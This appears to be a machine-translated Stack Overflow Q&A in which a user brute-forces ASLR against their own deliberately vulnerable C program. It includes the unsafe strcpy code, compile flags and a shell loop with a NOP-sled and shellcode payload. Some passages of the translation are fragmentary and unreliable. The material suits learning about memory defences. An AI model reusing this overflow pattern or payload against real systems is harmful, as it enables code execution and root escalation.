我刚刚阅读了地址空间布局随机化,我尝试了一个非常简单的脚本来尝试对其进行暴力破解。这是我用来测试一些东西的程序。
#include <stdio.h>
#include <string.h>
int main (int argc, char **argv)
{
char buf[8];
printf("&buf = %p\n", buf);
if (argc > 1 && strcpy(buf, argv[1]));
return 0;
}
我用这个命令编译它:
gcc -g -fno-stack-protector -o vul vul.c
我确保启用了 ASLR:
$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
然后,我想出了这个简单的脚本:
str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
. "\x90"x65536 \
. "\x31\xc0\x40\x89\xc3\xcd\x80"'`
while [ $? -ne 1 ]; do
./vul $str
done
格式是
return address many times | 64KB NOP slide | shellcode that runs exit(1)
运行此脚本几秒钟后,它以我想要的错误代码 1 退出。我还尝试了其他调用 execv("/bin/sh", ...) 的 shellcode,我也成功了。
我觉得奇怪的是,即使在返回地址之后也可以创建这么长的 NOP 幻灯片。我认为 ASLR 更有效,我错过了什么吗?是不是因为地址空间太小了?
编辑 :我做了一些额外的研究,这是我发现的:
-m32 -z execstack 运行此代码,在稍微更改返回地址后,他得到了相同的结果。 -z execstack ,我还是设法执行了 shellcode。我通过使用不同的 shellcode 来确保这一点,它们都做了他们应该做的事情(即使是众所周知的场景 chown root ./vul 、 chmod +s ./vul 、运行 setreuid(0, 0) 然后 execv("/bin/sh", ...) 和最后 whoami 在生成的 shell 中返回“root”的 shellcode)。这很奇怪,因为
execstack -q ./vul 告诉我可执行堆栈标志位没有设置。有谁知道为什么? 最佳答案
首先,我有点惊讶您不需要将选项 -z execstack 传递给编译器来获取 shellcode 来执行 exit(1) 。
此外,我猜您使用的是 32 位机器,因为您没有将选项 -m32 传递给 gcc 以获得 32 位代码。
最后,我没有成功运行你的程序(我等了几秒钟)。
所以,我对你的结论有点怀疑(除非你运行的是一个非常特殊的 Linux 系统或者可能很幸运)。
无论如何,有两件主要的事情你没有提到:
您可以查看 ASLR 维基百科页面上的“ASLR Effectiveness”部分。
关于c - ASLR 蛮力,我们在Stack Overflow上找到一个类似的问题:https://stackoverflow.com/questions/16110591/